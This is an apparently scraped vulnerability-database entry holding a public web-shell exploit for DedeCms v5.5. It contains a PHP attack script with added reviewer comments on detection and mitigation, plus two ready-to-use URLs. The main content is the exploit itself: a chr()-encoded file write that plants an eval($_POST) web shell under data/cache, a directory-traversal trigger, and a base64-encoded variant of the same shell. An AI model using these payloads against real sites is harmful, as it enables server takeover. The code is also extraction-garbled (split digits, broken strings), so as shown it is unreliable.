DedeCms v5.5 vulnerability - vulnerability warning - the black bar safety net

2010-03-22T00:00:00
ID MYHACK58:62201026513
Type myhack58
Reporter 佚名
Modified 2010-03-22T00:00:00

Description

<? php print_r(' +----------------------------------------+ dedecms v5. 5 final getwebshell exploit +----------------------------------------+ '); if ($argc < 3) { print_r(' +----------------------------------------+ Usage: php '.$ argv[0].' host path host: target server (ip/hostname) path: path to dedecms Example: php '.$ argv[0].' localhost /dedecms/ +----------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0);
// NOTE(review): the listing above and below is an extraction-mangled copy of a
// public exploit for DedeCms v5.5 (digits split as "8 0" / "1 0 2 4" / "2 0 0",
// stray spaces in "$ host", "\ r\n", the trailing "?& gt;") and is not valid PHP
// as shown. The code has been left byte-for-byte as found; the comments describe
// what it attempts so the behaviour can be recognised in web-server logs and
// mitigated in the application.
//
// Preamble: banner, usage check (requires host and path on argv), no run-time
// limit, and error_reporting(7) = E_ERROR|E_WARNING|E_PARSE (notices hidden).

// Target host and application path are used verbatim from the command line.
$host = $argv[1]; $path = $argv[2];

// Request 1 ($post_a): GET plus/digg_ajax.php with a crafted `id`. The value is
// not a plain integer: after "1024e1024&/" it carries a PHP expression of the
// form fputs(fopen(<chr()-built name>, <chr()-built mode>), <chr()-built body>),
// i.e. a file write whose name and contents are hidden behind chr() calls.
// Request 2 ($post_b): POST plus/comments_frame.php with `needCode` set to
// "aa/../../../data/mysql_error_trace" - directory traversal in that parameter.
// $shell: the relative path the script later probes; together with the page's
// closing note it indicates the write lands under data/cache/ (inferred).
// Detection: a non-numeric `id` on digg_ajax.php (especially one containing
// "fputs", "fopen" or "chr("), any `needCode` containing "../", and new .php
// files appearing under data/cache/.
// Mitigation: validate `id` as a strict integer before use, reject path
// separators and ".." in `needCode`, and serve data/cache with PHP execution
// disabled and without web-server write access where the application allows.
$post_a = 'plus/digg_ajax. php? id=1024e1024&/fputs(fopen(chr(4 6). chr(4 6). chr(4 7). chr(1 0 0). chr(9 7). chr(1 1 6). chr(9 7). chr(4 7). chr(9 9). chr(9 7). chr(9 9). chr(1 0 4). chr(1 0 1). chr(4 7). chr(1 1 6). chr(4 6). chr(1 1 2). chr(1 0 4). chr(1 1 2),chr(1 1 9). chr(4 3)),chr(6 0). chr(6 3). chr(1 1 2). chr(1 0 4). chr(1 1 2). chr(3 2). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 0). chr(3 6). chr(9 5). chr(8 0). chr(7 9). chr(8 3). chr(8 4). chr(9 1). chr(3 9). chr(1 1 6). chr(3 9). chr(9 3). chr(4 1). chr(5 9). chr(6 3). chr(6 2));/'; $post_b = 'needCode=aa/../../../data/mysql_error_trace'; $shell = 'data/cache/t.php';

// Send the two requests in order, then POST `t=echo tojen;` to $shell as a
// liveness probe. Only the HTTP status of that last response is inspected
// below; the body (and any "tojen" output) is never checked.
get_send($post_a); post_send('plus/comments_frame.php',$post_b); $content = post_send($shell,'t=echo tojen;');

// Success test: bytes 9..11 of the raw response, i.e. the status code in an
// "HTTP/1.x NNN" status line, must read 200 (mangled here as '2 0 0').
// get_send($url): hand-built HTTP/1.1 GET over fsockopen() on port 80 ("8 0").
// On connect failure it only echoes a message and falls through, so fputs()
// is then called on `false` - the script mis-reports rather than aborting.
// The fixed User-Agent "Mozilla/4.0 (compatible; MSIE 6.00; ...)" combined
// with a Referer that points back at the target itself is a weak but
// loggable signature of this tool.
if(substr($content,9,3)=='2 0 0'){ echo "\nShell Address is:".$ host.$ path.$ shell; }else{ echo "\nError."; } function get_send($url){ global $host, $path; $message = "GET ".$ path."$ url HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Referer: http://$host$path\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Connection: Close\r\n\r\n"; $fp = fsockopen($host, 8 0); if(!$ fp){ echo "\nConnect to host Error"; } fputs($fp, $message);

// Response accumulator (presumably '' before mangling; as shown the lone
// double quote opens an unterminated string).
$back = ";

// Read until EOF in 1024-byte chunks ("1 0 2 4"), close the socket and return
// the raw response, headers included.
while (! feof($fp)) $back .= fread($fp, 1 0 2 4); fclose($fp); return $back;

// post_send($url, $cmd): same hand-built request as get_send() but as a POST,
// adding a Content-Length header and sending $cmd as the body. It shares the
// same unchecked-socket weakness after fsockopen().
} function post_send($url,$cmd){

global $host, $path; $message = "POST ".$ path."$ url HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Referer: http://$host$path\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ". strlen($cmd)."\ r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 8 0); if(!$ fp){ echo "\nConnect to host Error"; } fputs($fp, $message);

// Response accumulator, mangled exactly as in get_send().
$back = ";

// Read loop and return as in get_send(). The trailing "?& gt;" is an
// HTML-escaped closing PHP tag left over from the page extraction.
while (! feof($fp)) $back .= fread($fp, 1 0 2 4); fclose($fp); return $back; } ?& gt;

Using the method Copy the code http://xxx.com//uploads/plus/digg_frame.php?action=good&id=1 0 2 4% 6 5 1 0 2 4&mid=*/fputs(fopen(base64_decode(ZGF0YS9jYWNoZS9jLnBocA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgpz4));?& gt;

Copy the code http://xxx.com/uploads/plus/comments_frame.php?id=2&needCode=/../../../data/mysql_error_trace

c.php is generated under data/cache